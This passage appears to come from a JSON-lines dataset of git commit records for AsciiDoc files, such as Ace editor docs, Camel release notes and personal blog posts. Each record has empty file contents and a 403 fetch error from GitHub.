randonb927\/ace,CAAL\/ace,enricoberti\/ace,dudb\/ace,bradydowling\/ace,skylarkcob\/ace,likitha\/ace,vgrish\/ace,durai145\/ace,Stackato-Apps\/ace,thsunmy\/ace,bradydowling\/ace,skynetbot\/ace,Eynaliyev\/ace,JanvanCasteren\/ace,sbusso\/ace,vgrish\/ace,2947721120\/ACE,sevin7676\/ace,jabgibson\/ace,l3dlp\/ace,gjtorikian\/ace,thdoan\/ace,zl352773277\/ace,derekja\/ace,skylarkcob\/ace,swong15\/ace-fork,ggalancs\/ace,alexbarnsley\/ace,zpzgone\/ace,wende\/alchemide,Gottox\/ace,EthanK28\/ace,multiarc\/ace,bradydowling\/ace,mdinger\/ace,397239396\/ace,sekcheong\/ace,skynetbot\/ace,AaronZhangL\/ace,itsff\/ace,bradparks\/ace,wcandillon\/ace,CAAL\/ace,cintiamh\/ace,makelivedotnet\/ace,JanvanCasteren\/ace,shidao-fm\/ace,cintiamh\/ace,kevinkmp\/ace,zpzgone\/ace,2947721120\/ACE,JanvanCasteren\/ace,sekcheong\/ace,makelivedotnet\/ace,paladox\/ace,vgrish\/ace,derekja\/ace,ylian\/ace,brandonb927\/ace,shamim8888\/ace,sekcheong\/ace,2947721120\/ACE,Mabbu9\/ace,zpzgone\/ace,jabgibson\/ace,wende\/alchemide,dudb\/ace,tbutter\/ace,tranch-xiao\/ace,MarkBandilla\/ace,Eynaliyev\/ace,jabgibson\/ace,WigWagCo\/ace,2947721120\/ACE,Gottox\/ace,397239396\/ace,CAAL\/ace,durai145\/ace,mlajtos\/ace,sekcheong\/ace,thsunmy\/ace,Khan\/ace,animack\/ace,XCage15\/ace,397239396\/ace,jjatria\/ace,jabgibson\/ace,tobyreynold\/ace,2947721120\/ACE,sevin7676\/ace,makelivedotnet\/ace,zl352773277\/ace,skynetbot\/ace,sevin7676\/ace,sekcheong\/ace,397239396\/ace,paladox\/ace,2947721120\/ACE,Nicholas-Westley\/ace,CAAL\/ace,taylorleh\/ace,leanprover\/ace,leanprover\/ace,enricoberti\/ace,multiarc\/ace,animack\/ace,cintiamh\/ace,cintiamh\/ace,2947721120\/ACE,Khan\/ace,bcuff\/ace,tobyreynold\/ace,PatrickTo\/ace,multiarc\/ace,zpzgone\/ace,wende\/alchemide,tranch-xiao\/ace,tobyreynold\/ace,erezarnon\/ace,taylorleh\/ace,XCage15\/ace,qweasd1\/ace,tobyreynold\/ace,mrlong\/ace,tbutter\/ace,sevin7676\/ace,IChocolateKapa\/ace,thsunmy\/ace,sbusso\/ace,mkosieradzki\/ace,Khan\/ace,makelivedotnet\/ace,jjatria\/ace,bradparks\/ace,ylian\/ace,brandonb927\/ace,mrlong\/ace,Mabbu9\/ace,JanvanCasteren\/ace,ThiagoGarciaAlves\/ace,mkosieradzki\/ace,2947721120\/ACE,bradparks\/ace,luvegt\/ace,Nicholas-Westley\/ace,tranch-xiao\/ace,MarkBandilla\/ace,ThiagoGarciaAlves\/ace,shidao-fm\/ace,Amrit01\/ace,Eynaliyev\/ace,zl352773277\/ace,eranwitkon\/ace,ylian\/ace,gjtorikian\/ace,derekja\/ace,eranwitkon\/ace,thdoan\/ace,zpzgone\/ace,AaronZhangL\/ace,XCage15\/ace,EthanK28\/ace,MarkBandilla\/ace,enricoberti\/ace,JaroslavMoravec\/ace,soonhokong\/lean-ace,mdinger\/ace,eranwitkon\/ace,animack\/ace,tranch-xiao\/ace,EthanK28\/ace,durai145\/ace,taylorleh\/ace,alexbarnsley\/ace,leanprover\/ace,multiarc\/ace,cintiamh\/ace,gjtorikian\/ace,ezoapp\/aceeditor,MarkBandilla\/ace,brandonb927\/ace,Stackato-Apps\/ace,taylorleh\/ace,wende\/alchemide,vgrish\/ace,Mabbu9\/ace,WigWagCo\/ace,sekcheong\/ace,JanvanCasteren\/ace,skynetbot\/ace,itsff\/ace,Khan\/ace,Gottox\/ace,dudb\/ace,WigWagCo\/ace,derekja\/ace,tranch-xiao\/ace,AlphaStaxLLC\/ace,enricoberti\/ace,ggalancs\/ace,skylarkcob\/ace,bradydowling\/ace,qweasd1\/ace,patope\/ace,WigWagCo\/ace,gjtorikian\/ace,zl352773277\/ace,swong15\/ace-fork,thdoan\/ace,animack\/ace,brandonb927\/ace,Gottox\/ace,fjakobs\/ace,eranwitkon\/ace,XCage15\/ace,thsunmy\/ace,bcuff\/ace,jabgibson\/ace,Eynaliyev\/ace,sevin7676\/ace,swong15\/ace-fork,shamim8888\/ace,MarkBandilla\/ace,erezarnon\/ace,brandonb927\/ace,soonhokong\/lean-ace,fjakobs\/ace,wcandillon\/ace,thsunmy\/ace,paladox\/ace,STRd6\/ace,mlajtos\/ace,enricoberti\/ace,skynetbot\/ace,fjakobs\/ace,Eynaliyev\/ace,bcuff\/ace,qweasd1\/ace,tbutter\/ace,taylorleh\/ace,soonhokong\/lean-ace,durai145\/ace,STRd6\/ace,patope\/ace,wcandillon\/ace,fjakobs\/ace,shamim8888\/ace,mkosieradzki\/ace,Khan\/ace,ggalancs\/ace,wcandillon\/ace,Eynaliyev\/ace,mkosieradzki\/ace,jjatria\/ace,sekcheong\/ace,brandonb927\/ace,luvegt\/ace,animack\/ace,zl352773277\/ace,jabgibson\/ace,vgrish\/ace,erezarnon\/ace,bradydowling\/ace,shidao-fm\/ace,skynetbot\/ace,durai145\/ace,WigWagCo\/ace,Mabbu9\/ace,dudb\/ace,mdinger\/ace,alexbarnsley\/ace,CAAL\/ace,animack\/ace,cintiamh\/ace,Eynaliyev\/ace,tranch-xiao\/ace,2947721120\/ACE,XCage15\/ace,qweasd1\/ace,paladox\/ace,AaronZhangL\/ace,durai145\/ace,bcuff\/ace,makelivedotnet\/ace,alexbarnsley\/ace,patope\/ace,tbutter\/ace,Amrit01\/ace,397239396\/ace,WigWagCo\/ace,397239396\/ace,bcuff\/ace,Nicholas-Westley\/ace,multiarc\/ace,Stackato-Apps\/ace,soonhokong\/lean-ace,bcuff\/ace,paladox\/ace,ektx\/ace,kevinkmp\/ace,bradparks\/ace,Amrit01\/ace,IChocolateKapa\/ace,bradparks\/ace,zl352773277\/ace,Mabbu9\/ace,likitha\/ace,bradparks\/ace,skylarkcob\/ace,mlajtos\/ace,mdinger\/ace,JaroslavMoravec\/ace,gjtorikian\/ace,patope\/ace,skylarkcob\/ace,XCage15\/ace,leanprover\/ace,zl352773277\/ace,397239396\/ace,shamim8888\/ace,multiarc\/ace,ThiagoGarciaAlves\/ace,leanprover\/ace,397239396\/ace,bradydowling\/ace,erezarnon\/ace,Amrit01\/ace,ezoapp\/aceeditor,Nicholas-Westley\/ace,gjtorikian\/ace,AaronZhangL\/ace,sbusso\/ace,sbusso\/ace,brandonb927\/ace,itsff\/ace,PatrickTo\/ace,wende\/alchemide,enricoberti\/ace,sevin7676\/ace,gjtorikian\/ace,mkosieradzki\/ace,dudb\/ace,Stackato-Apps\/ace,STRd6\/ace,mdinger\/ace,AlphaStaxLLC\/ace,tranch-xiao\/ace,zl352773277\/ace,sevin7676\/ace,kevinkmp\/ace,gjtorikian\/ace,sbusso\/ace,mkosieradzki\/ace,sbusso\/ace,tbutter\/ace,cintiamh\/ace,Mabbu9\/ace,taylorleh\/ace,derekja\/ace,sevin7676\/ace,durai145\/ace,erezarnon\/ace,2947721120\/ACE,jabgibson\/ace,animack\/ace,l3dlp\/ace,durai145\/ace,bradydowling\/ace,multiarc\/ace,fjakobs\/ace,taylorleh\/ace,paladox\/ace,mrlong\/ace,Eynaliyev\/ace,ggalancs\/ace,ThiagoGarciaAlves\/ace,mkosieradzki\/ace,zl352773277\/ace,wende\/alchemide,shidao-fm\/ace,bradydowling\/ace,durai145\/ace,itsff\/ace,Khan\/ace,animack\/ace,brandonb927\/ace,Stackato-Apps\/ace,JanvanCasteren\/ace,AlphaStaxLLC\/ace,Mabbu9\/ace,2947721120\/ACE,Nicholas-Westley\/ace,tobyreynold\/ace,patope\/ace,mdinger\/ace,JanvanCasteren\/ace,zpzgone\/ace,AaronZhangL\/ace,thsunmy\/ace,mkosieradzki\/ace,gjtorikian\/ace,Stackato-Apps\/ace,brandonb927\/ace,Gottox\/ace,jjatria\/ace,PatrickTo\/ace,likitha\/ace,mkosieradzki\/ace,WigWagCo\/ace,tobyreynold\/ace,erezarnon\/ace,soonhokong\/lean-ace,l3dlp\/ace,dudb\/ace,jabgibson\/ace,brandonb927\/ace,zpzgone\/ace,AlphaStaxLLC\/ace,Mabbu9\/ace,JaroslavMoravec\/ace,thdoan\/ace,MarkBandilla\/ace,mlajtos\/ace,STRd6\/ace,luvegt\/ace,vgrish\/ace,ezoapp\/aceeditor,dudb\/ace,MarkBandilla\/ace,skynetbot\/ace,derekja\/ace,ylian\/ace,MarkBandilla\/ace,sevin7676\/ace,gjtorikian\/ace,tbutter\/ace,Nicholas-Westley\/ace,alexbarnsley\/ace,enricoberti\/ace,AaronZhangL\/ace,mkosieradzki\/ace,ezoapp\/aceeditor,AaronZhangL\/ace,makelivedotnet\/ace,taylorleh\/ace,animack\/ace,AlphaStaxLLC\/ace,mrlong\/ace,paladox\/ace,jjatria\/ace,Khan\/ace,shamim8888\/ace,tobyreynold\/ace,multiarc\/ace,Stackato-Apps\/ace,multiarc\/ace,JanvanCasteren\/ace,zl352773277\/ace,taylorleh\/ace,bcuff\/ace,fjakobs\/ace,shidao-fm\/ace,derekja\/ace,AaronZhangL\/ace,acanakoglu\/ace,vgrish\/ace,Khan\/ace,skylarkcob\/ace,wcandillon\/ace,Nicholas-Westley\/ace,soonhokong\/lean-ace,luvegt\/ace,zl352773277\/ace,shamim8888\/ace,Amrit01\/ace,EthanK28\/ace,ylian\/ace,JaroslavMoravec\/ace,MarkBandilla\/ace,alexbarnsley\/ace,tbutter\/ace,tobyreynold\/ace,cintiamh\/ace,CAAL\/ace,mdinger\/ace,jjatria\/ace,skynetbot\/ace,XCage15\/ace,itsff\/ace,itsff\/ace,MarkBandilla\/ace,wcandillon\/ace,mrlong\/ace","old_file":"demo\/kitchen-sink\/docs\/AsciiDoc.asciidoc","new_file":"demo\/kitchen-sink\/docs\/AsciiDoc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjatria\/ace.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e66a75ec66ac72e7e001a3b810918bb5c7788861","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c049f0ff4e8920821c2fc40fd95eb65e393ed351","subject":"Update 2018-07-09-P-H-P-C-S-Fixer-Git.adoc","message":"Update 2018-07-09-P-H-P-C-S-Fixer-Git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-09-P-H-P-C-S-Fixer-Git.adoc","new_file":"_posts\/2018-07-09-P-H-P-C-S-Fixer-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91fc197555938903cc8cfa26aa1d1bcd65fe97b7","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f93e97a676a93db33b8dc57e0f9d2be8147a189","subject":"docs: add warning to wait between FS rebuilds","message":"docs: add warning to wait between FS rebuilds\n\nCustomers who are rebuilding multiple Kudu nodes may permanently delete\nall healthy replicas for a tablet. This won't prevent data loss in the\nevent that a only single copy remains and is deleted, but waiting should\nhelp prevent such situations.\n\nChange-Id: I5659c2ba05a0a6b9905213c5df6ba0dcb371f312\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9279\nReviewed-by: Alex Rodoni <b46da68bf9b818cec7052f7cdfe9b3e69485676b@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbda4e8c9f8b3a26a14184781dabc0b1d9c4c65d","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc4b2f824c2e681cd95bc5be274afc7fa32fc2d3","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26f5cde8808f69c3135b55badeca52b86b3e8b3","subject":"Added Camel 2.18.0 release notes to docs","message":"Added Camel 2.18.0 release notes to docs\n","repos":"pmoerenhout\/camel,adessaigne\/camel,anoordover\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,jamesnetherton\/camel,onders86\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,tadayosi\/camel,sverkera\/camel,pax95\/camel,Fabryprog\/camel,mcollovati\/camel,kevinearls\/camel,objectiser\/camel,sverkera\/camel,kevinearls\/camel,objectiser\/camel,nikhilvibhav\/camel,sverkera\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,nicolaferraro\/camel,jamesnetherton\/camel,adessaigne\/camel,onders86\/camel,pmoerenhout\/camel,tadayosi\/camel,ullgren\/camel,ullgren\/camel,anoordover\/camel,apache\/camel,tadayosi\/camel,onders86\/camel,sverkera\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,CodeSmell\/camel,apache\/camel,pax95\/camel,onders86\/camel,zregvart\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,christophd\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,ullgren\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,pmoerenhout\/camel,jamesnetherton\/camel,objectiser\/camel,DariusX\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,CodeSmell\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,kevinearls\/camel,tdiesler\/camel,zregvart\/camel,jamesnetherton\/camel,adessaigne\/camel,cunningt\/camel,DariusX\/camel,pax95\/camel,kevinearls\/camel,tdiesler\/camel,gnodet\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,nicolaferraro\/camel,objectiser\/camel,sverkera\/camel,christophd\/camel,mcollovati\/camel,zregvart\/camel,mcollovati\/camel,nicolaferraro\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,Fabryprog\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,alvinkwekel\/camel,onders86\/camel,CodeSmell\/camel,jamesnetherton\/camel,anoordover\/camel,davidkarlsen\/camel,jamesnetherton\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,kevinearls\/camel,Fabryprog\/camel,davidkarlsen\/camel,davidkarlsen\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,alvinkwekel\/camel,onders86\/camel,adessaigne\/camel,ullgren\/camel,mcollovati\/camel,cunningt\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2180-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2180-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3a24bc8d6605ed64c4c9704aada2bee1b3013b6","subject":"Add release notes for Camel 2.23.2","message":"Add release notes for Camel 2.23.2\n\nSigned-off-by: Gregor Zurowski <5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,objectiser\/camel,zregvart\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,CodeSmell\/camel,DariusX\/camel,Fabryprog\/camel,mcollovati\/camel,gnodet\/camel,ullgren\/camel,CodeSmell\/camel,pmoerenhout\/camel,zregvart\/camel,apache\/camel,objectiser\/camel,cunningt\/camel,nikhilvibhav\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,nicolaferraro\/camel,tadayosi\/camel,christophd\/camel,mcollovati\/camel,nikhilvibhav\/camel,Fabryprog\/camel,mcollovati\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,tadayosi\/camel,Fabryprog\/camel,pax95\/camel,christophd\/camel,apache\/camel,gnodet\/camel,tdiesler\/camel,alvinkwekel\/camel,pax95\/camel,zregvart\/camel,DariusX\/camel,nicolaferraro\/camel,cunningt\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,pmoerenhout\/camel,adessaigne\/camel,objectiser\/camel,alvinkwekel\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tadayosi\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,CodeSmell\/camel,tdiesler\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,pax95\/camel,pmoerenhout\/camel,cunningt\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,tadayosi\/camel,davidkarlsen\/camel,davidkarlsen\/camel,apache\/camel,apache\/camel,christophd\/camel,CodeSmell\/camel,davidkarlsen\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2232-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2232-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbb778730f8392fcd09e85cebfa36911d220fda5","subject":"added simple readme explaining tools dir contents","message":"added simple readme explaining tools dir contents\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"packaging\/tools\/README.asciidoc","new_file":"packaging\/tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"864ead9155c9b2f988be0872763a46d75f883020","subject":"add README-es File","message":"add README-es File\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,Git-Host\/Git-Host.io,alchapone\/alchapone.github.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,alchapone\/alchapone.github.io","old_file":"docs\/README-es.adoc","new_file":"docs\/README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ab28ed3c74563de3fa5385c658f3bf35ee8ebc","subject":"Update 2017-09-15-How-to-be-a-yogi.adoc","message":"Update 2017-09-15-How-to-be-a-yogi.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-15-How-to-be-a-yogi.adoc","new_file":"_posts\/2017-09-15-How-to-be-a-yogi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6d37c5c8e48707aded515325353a65a7a631267","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"gtugablue\/gtugablue.github.io,gtugablue\/gtugablue.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gtugablue\/gtugablue.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d553d0bb6c0bccec3c46905f57ac82eb25e525ff","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e0ea9d46ea717ea3637c9d34a27747fcb40063c","subject":"Update 2016-06-18-Euro-Watching-Engineering.adoc","message":"Update 2016-06-18-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd72bea34e11477cee97932084c7cd743f6c8ba6","subject":"Update 2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","message":"Update 2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","new_file":"_posts\/2013-06-03-Eclipse-ameliorer-laide-a-la-saisie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e584418e4d3da5b4821bb8db2cabab5675683612","subject":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38ceb8b9783be5777d853d8bd11061be1aeb67c8","subject":"Update 2016-03-31-Decompile-me-basic.adoc","message":"Update 2016-03-31-Decompile-me-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_file":"_posts\/2016-03-31-Decompile-me-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ff667ff92942837364220beaa6eadad42bcbff5","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1b52db593acc4b25da9b7cb76492ca770613f98","subject":"Update 2017-10-16-My-First-Blog-Post.adoc","message":"Update 2017-10-16-My-First-Blog-Post.adoc","repos":"SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io,SockPastaRock\/hubpress.io","old_file":"_posts\/2017-10-16-My-First-Blog-Post.adoc","new_file":"_posts\/2017-10-16-My-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b935137ed70e95106e5d4dac024e7aa9f36041f","subject":"Update 2017-12-10-A-story-of-a-story.adoc","message":"Update 2017-12-10-A-story-of-a-story.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-12-10-A-story-of-a-story.adoc","new_file":"_posts\/2017-12-10-A-story-of-a-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7290d413e0041baf156252cf6e8e86e8e7902419","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 